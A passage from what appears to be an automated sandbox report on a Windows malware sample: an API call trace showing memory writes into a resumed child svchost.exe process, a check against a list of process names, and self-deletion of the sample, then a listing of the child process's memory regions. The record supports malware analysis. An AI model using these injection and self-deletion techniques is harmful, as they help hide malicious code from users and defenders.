[35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x18, [45]=0x2, [46]=0x70, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0077.840] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2580000) returned 0x0 [0077.850] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0077.850] CloseHandle (hObject=0x1e4) returned 1 [0077.850] NtProtectVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x5df5f0*=0x7ff673b43440, NumberOfBytesToProtect=0x5df5f8, NewAccessProtection=0x40, OldAccessProtection=0x5df5e8 | out: BaseAddress=0x5df5f0*=0x7ff673b43000, NumberOfBytesToProtect=0x5df5f8, OldAccessProtection=0x5df5e8*=0x20) returned 0x0 [0077.850] NtWriteVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x7ff673b43440, Buffer=0x5df658*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x5df5e0 | out: Buffer=0x5df658*, NumberOfBytesWritten=0x5df5e0*=0x4) returned 0x0 [0077.851] NtProtectVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x5df5f0*=0x7ff673b43000, NumberOfBytesToProtect=0x5df5f8, NewAccessProtection=0x20, OldAccessProtection=0x5df5e8 | out: BaseAddress=0x5df5f0*=0x7ff673b43000, NumberOfBytesToProtect=0x5df5f8, OldAccessProtection=0x5df5e8*=0x40) returned 0x0 [0077.851] ResumeThread (hThread=0x1d8) returned 0x1 [0077.862] CloseHandle (hObject=0x1d8) returned 1 [0077.862] CloseHandle (hObject=0x1dc) returned 1 [0077.862] RtlFreeAnsiString (AnsiString="E") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="RuntimeBroker.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="R") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="ShellExperienceHost.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="S") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="SearchUI.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="S") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="backgroundTaskHost.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="B") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="backgroundTaskHost.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="B") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="uni_likely_strap.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="U") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="deliverreason.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="D") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="relating-endangered.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="R") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="immediatecustomerrecommendation.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="I") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="conversations_obituaries.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="C") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="essentials.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="E") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="takes-textbooks.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="T") [0077.862] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="sponsoredreservoir.exe", AllocateDestinationString=1) returned 0x0 [0077.862] RtlFreeAnsiString (AnsiString="S") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="proportionbrochuresenjoying.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="P") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="jul.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="J") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="movie.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="M") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="indian.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="I") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="mad.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="M") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="downloaded.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="D") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="skiing-layer.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="S") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="floors_individually.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="F") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="amsterdam_trade_riders.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="A") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="markets.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="M") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="relatively-privacy-ro.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="R") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="sitemap_replication_special.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="S") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="isolated-latinas.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="I") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="audiodg.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="A") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="S") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="sppsvc.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="S") [0077.863] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="autoclb.exe", AllocateDestinationString=1) returned 0x0 [0077.863] RtlFreeAnsiString (AnsiString="A") [0077.863] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0077.863] CreateWaitableTimerA (lpTimerAttributes=0x5dff1c, bManualReset=1, lpTimerName="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 0x1dc [0077.864] SetWaitableTimer (hTimer=0x1dc, lpDueTime=0x5dff10, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0077.864] CloseHandle (hObject=0x1dc) returned 1 [0077.864] LocalFree (hMem=0x618430) returned 0x0 [0077.864] SetFileAttributesW (lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\educat.exe", dwFileAttributes=0x80) returned 1 [0077.866] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmn~1\\desktop\\educat.exe")) returned 1 [0077.867] HeapDestroy (hHeap=0x1e30000) returned 1 [0077.878] ExitProcess (uExitCode=0x0) Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x66ca000" os_pid = "0xfd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xfb8" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 640 start_va = 0x7f53f000 end_va = 0x7f53ffff entry_point = 0x0 region_type = private name = "private_0x000000007f53f000" filename = "" Region: id = 641 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 642 start_va = 0x9eda5c0000 end_va = 0x9eda5dffff entry_point = 0x0 region_type = private name = "private_0x0000009eda5c0000" filename = "" Region: id = 643 start_va = 0x9eda5e0000 end_va = 0x9eda5f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009eda5e0000" filename = "" Region: id = 644 start_va = 0x9eda600000 end_va = 0x9eda67ffff entry_point = 0x0 region_type = private name = "private_0x0000009eda600000" filename = "" Region: id = 645 start_va = 0x9eda680000 end_va = 0x9eda683fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009eda680000" filename = "" Region: id = 646 start_va = 0x9eda690000 end_va = 0x9eda690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009eda690000" filename = "" Region: id = 647 start_va = 0x9eda6a0000 end_va = 0x9eda6a1fff entry_point = 0x0 region_type = private name = "private_0x0000009eda6a0000" filename = "" Region: id = 648 start_va = 0x7df5ffa70000 end_va = 0x7ff5ffa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa70000" filename = "" Region: id = 649 start_va = 0x7ff673430000 end_va = 0x7ff673452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff673430000" filename = "" Region: id = 650 start_va = 0x7ff673454000 end_va = 0x7ff673454fff entry_point = 0x0 region_type = private name = "private_0x00007ff673454000" filename = "" Region: id = 651 start_va = 0x7ff67345e000 end_va = 0x7ff67345ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67345e000" filename = "" Region: id = 652 start_va = 0x7ff673b40000 end_va = 0x7ff673b4cfff entry_point = 0x7ff673b40000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 653 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 662 start_va = 0x9eda740000 end_va = 0x9eda746fff entry_point = 0x0 region_type = private name = "private_0x0000009eda740000" filename = "" Region: id = 663 start_va = 0x9eda800000 end_va = 0x9eda8fffff entry_point = 0x0 region_type = private name = "private_0x0000009eda800000" filename = "" Region: id = 664 start_va = 0x7ff8eb870000 end_va = 0x7ff8eba4cfff entry_point = 0x7ff8eb870000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 665 start_va = 0x7ff8ee2d0000 end_va = 0x7ff8ee37cfff entry_point = 0x7ff8ee2d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 667 start_va = 0x5c0000 end_va = 0x6f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 668 start_va = 0x9eda5c0000 end_va = 0x9eda5cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009eda5c0000" filename = "" Region: id = 669 start_va = 0x9eda6b0000 end_va = 0x9eda72ffff entry_point = 0x0 region_type = private name = "private_0x0000009eda6b0000" filename = "" Region: id = 670 start_va = 0x9eda900000 end_va = 0x9eda9bdfff entry_point = 0x9eda900000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 671 start_va = 0x7ff673330000 end_va = 0x7ff67342ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff673330000" filename = "" Region: id = 672 start_va = 0x7ff67345c000 end_va = 0x7ff67345dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67345c000" filename = "" Region: id = 673 start_va = 0x7ff8ec240000 end_va = 0x7ff8ec29afff entry_point = 0x7ff8ec240000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 674 start_va = 0x7ff8ec450000 end_va = 0x7ff8ec575fff entry_point = 0x7ff8ec450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 681 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 682 start_va = 0x7ff8d50d0000 end_va = 0x7ff8d50effff entry_point = 0x7ff8d50d0000 region_type = mapped_file name = "avifil32.dll" filename = "\\Windows\\System32\\avifil32.dll" (normalized: "c:\\windows\\system32\\avifil32.dll") Region: id = 683 start_va = 0x7ff8ee0b0000 end_va = 0x7ff8ee14cfff entry_point = 0x7ff8ee0b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 684 start_va = 0x7ff8edd60000 end_va = 0x7ff8edfdbfff entry_point = 0x7ff8edd60000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 685 start_va = 0x7ff8ee190000 end_va = 0x7ff8ee235fff entry_point = 0x7ff8ee190000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 686 start_va = 0x7ff8edbc0000 end_va = 0x7ff8edd44fff entry_point = 0x7ff8edbc0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 687 start_va = 0x7ff8ebdc0000 end_va = 0x7ff8ebf0dfff entry_point = 0x7ff8ebdc0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 688 start_va = 0x7ff8ec300000 end_va = 0x7ff8ec440fff entry_point = 0x7ff8ec300000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 689 start_va = 0x7ff8d4970000 end_va = 0x7ff8d4998fff entry_point = 0x7ff8d4970000 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\System32\\msvfw32.dll" (normalized: "c:\\windows\\system32\\msvfw32.dll") Region: id = 690 start_va = 0x7ff8d50b0000 end_va = 0x7ff8d50cbfff entry_point = 0x7ff8d50b0000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 691 start_va = 0x7ff8db910000 end_va = 0x7ff8db93bfff entry_point = 0x7ff8db910000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 692 start_va = 0x7ff8db940000 end_va = 0x7ff8db962fff entry_point = 0x7ff8db940000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 693 start_va = 0x7ff8e9720000 end_va = 0x7ff8e9746fff entry_point = 0x7ff8e9720000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 694 start_va = 0x7ff8eaf60000 end_va = 0x7ff8eafa3fff entry_point = 0x7ff8eaf60000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 695 start_va = 0x7ff8ec580000 end_va = 0x7ff8edaa4fff entry_point = 0x7ff8ec580000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 696 start_va = 0x7ff8eb180000 end_va = 0x7ff8eb7a7fff entry_point = 0x7ff8eb180000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 697 start_va = 0x7ff8edfe0000 end_va = 0x7ff8ee030fff entry_point = 0x7ff8edfe0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 698 start_va = 0x7ff8eae20000 end_va = 0x7ff8eae2efff entry_point = 0x7ff8eae20000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 699 start_va = 0x7ff8eb7b0000 end_va = 0x7ff8eb862fff entry_point = 0x7ff8eb7b0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 700 start_va = 0x7ff8eadd0000 end_va = 0x7ff8eae19fff entry_point = 0x7ff8eadd0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 701 start_va = 0x7ff8eae30000 end_va = 0x7ff8eae42fff entry_point = 0x7ff8eae30000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 702 start_va = 0x7ff8d4c40000 end_va = 0x7ff8d4ce9fff entry_point = 0x7ff8d4c40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 703 start_va = 0x9eda9c0000 end_va = 0x9edab4cfff entry_point = 0x0 region_type = private name = "private_0x0000009eda9c0000" filename = "" Region: id = 704 start_va = 0x9edab50000 end_va = 0x9edad4ffff entry_point = 0x0 region_type = private name = "private_0x0000009edab50000" filename = "" Region: id = 705 start_va = 0x9edac00000 end_va = 0x9edacfffff entry_point = 0x0 region_type = private name = "private_0x0000009edac00000" filename = "" Region: id = 706 start_va = 0x9eda750000 end_va = 0x9eda783fff entry_point = 0x9eda750000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 707 start_va = 0x9edad00000 end_va = 0x9edae87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009edad00000" filename = "" Region: id = 708 start_va = 0x7ff8ee150000 end_va = 0x7ff8ee185fff entry_point = 0x7ff8ee150000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 709 start_va = 0x7ff8ec0c0000 end_va = 0x7ff8ec21bfff entry_point = 0x7ff8ec0c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 710 start_va = 0x9edae90000 end_va = 0x9edb010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009edae90000" filename = "" Region: id = 711 start_va = 0x9edb020000 end_va = 0x9edc41ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009edb020000" filename = "" Region: id = 712 start_va = 0x9eda5d0000 end_va = 0x9eda5d0fff entry_point = 0x9eda5d0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 713 start_va = 0x9eda730000 end_va = 0x9eda730fff entry_point = 0x0 region_type = private name = "private_0x0000009eda730000" filename = "" Region: id = 714 start_va = 0x9eda750000 end_va = 0x9eda750fff entry_point = 0x0 region_type = private name = "private_0x0000009eda750000" filename = "" Region: id = 715 start_va = 0x9eda9c0000 end_va = 0x9edaa6cfff entry_point = 0x0 region_type = private name = "private_0x0000009eda9c0000" filename = "" Region: id = 716 start_va = 0x9edab40000 end_va = 0x9edab4cfff entry_point = 0x0 region_type = private name = "private_0x0000009edab40000" filename = "" Region: id = 717 start_va = 0x9edc420000 end_va = 0x9edc61ffff entry_point = 0x0 region_type = private name = "private_0x0000009edc420000" filename = "" Region: id = 718 start_va = 0x9edc500000 end_va = 0x9edc5fffff entry_point = 0x0 region_type = private name = "private_0x0000009edc500000" filename = "" Thread: id = 24 os_tid = 